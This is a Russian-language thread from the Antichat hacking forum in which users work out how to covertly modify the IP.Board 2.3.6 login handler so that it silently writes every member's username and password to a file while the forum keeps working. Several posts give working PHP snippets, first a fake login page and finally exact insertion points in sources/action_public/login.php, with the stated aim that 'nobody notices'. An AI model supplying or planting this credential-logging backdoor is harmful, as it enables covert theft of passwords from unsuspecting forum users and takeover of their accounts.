Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   ipb форма входа (https://forum.antichat.xyz/showthread.php?t=172439)

{BuT@Min} 21.01.2010 19:04
ipb форма входа
 
Подскажите как к ipb 2.3.6 можно прикрутить к форме входа скрипт которы бы сохранял логин и пароль в отдельный файл,но при этом и заходил на форум.Если мона скрипт или ссылку на что нить подобное.Заранее благодарен за ответы. :confused:

DeepBlue7 21.01.2010 23:39
Просто замути фейк. В index.php измени скрипт, к которому будет обращатся форма входа например на exploit.php и пропиши туда

Код:
<?php
$login = $_POST['login'];
$pass = $_POST['pass'];
$fp = fopen('fadsa.php', 'a+');
fwrite($fp, "$login:$pass<br>");
fclose($fp);

header("Location: success.php");
?>
Тоесть $login, $pass пропишется в файл fadsa.php на веб сервере. После того как пользователь ввел логин и пароль он будет перенаправлен на success.php

{BuT@Min} 22.01.2010 00:37
Цитата:
Сообщение от DeepBlue7
Просто замути фейк. В index.php измени скрипт, к которому будет обращатся форма входа например на exploit.php и пропиши туда

Код:
<?php
$login = $_POST['login'];
$pass = $_POST['pass'];
$fp = fopen('fadsa.php', 'a+');
fwrite($fp, "$login:$pass<br>");
fclose($fp);

header("Location: success.php");
?>
Тоесть $login, $pass пропишется в файл fadsa.php на веб сервере. После того как пользователь ввел логин и пароль он будет перенаправлен на success.php
Да в том и дело что мне фейк не нужен а нужно чтобы форум фунционировая и никто ничего не замечал))) я когда то видел что то подобное под dle

olishort 22.01.2010 00:54
Посмотри какие POST параметры передает скрипт, куда передает. Оттуда и копай

{BuT@Min} 22.01.2010 02:04
мнеб конкретики я в php не силён *(

DeepBlue7 22.01.2010 15:35
Ну тогда просто тупо "Дописываеш"

Код:
<?php
$login = $_POST['login'];
$pass = $_POST['pass'];
$fp = fopen('fadsa.php', 'a+');
fwrite($fp, "$login:$pass<br>");
fclose($fp);

?>
в скрипт который реально обрабатывает данные. единственное отличие только в
Код:
$login = $_POST['login'];
$pass = $_POST['pass'];
В post надо прописать те же значения которые реально использует форум.

{BuT@Min} 22.01.2010 16:14
Цитата:
Сообщение от DeepBlue7
Ну тогда просто тупо "Дописываеш"

<?php
$login = $_POST['login'];
$pass = $_POST['pass'];
$fp = fopen('fadsa.php', 'a+');
fwrite($fp, "$login:$pass<br>");
fclose($fp);

?>

в скрипт который реально обрабатывает данные. единственное отличие только в $login = $_POST['login'];
$pass = $_POST['pass'];

В post надо прописать те же значения которые реально использует форум.
Так всётаки понятней)))) Спасибо

DeepSy 22.01.2010 16:19
Цитата:
Сообщение от DeepBlue7
Ну тогда просто тупо "Дописываеш"

<?php
$login = $_POST['login'];
$pass = $_POST['pass'];
$fp = fopen('fadsa.php', 'a+');
fwrite($fp, "$login:$pass<br>");
fclose($fp);

?>

в скрипт который реально обрабатывает данные. единственное отличие только в $login = $_POST['login'];
$pass = $_POST['pass'];

В post надо прописать те же значения которые реально использует форум.
Значения все?
а то чо то не получается(

{BuT@Min} 22.01.2010 20:48
Цитата:
Сообщение от DeepSy
Значения все?
а то чо то не получается(
Открываеш sources\action_public там файл login.php

Находиш
PHP код:
username strtolower(str_replace'|''|'$this->ipsclass->input['UserName']) ); 
Ниже вставляеш

PHP код:
          $login $_POST['UserName']; 
потом ищеш
PHP код:
$this->han_login->login_authenticate$username$this->ipsclass->input['PassWord'] ); 
ниже вставляеш

PHP код:
$pass $_POST['PassWord'];
            $fp fopen('ИМЯ_ФАЙЛА.php''a+');
            fwrite($fp"$login:$pass<br>");
            fclose($fp); 
всё.
ИМЯ ФАЙЛА надо изменит на тот который у тебя,в корневой деректории

DeepBlue7 23.01.2010 00:58
Ну на конец то доперли. Наверн можно тему закрывать ))


Время: 10:58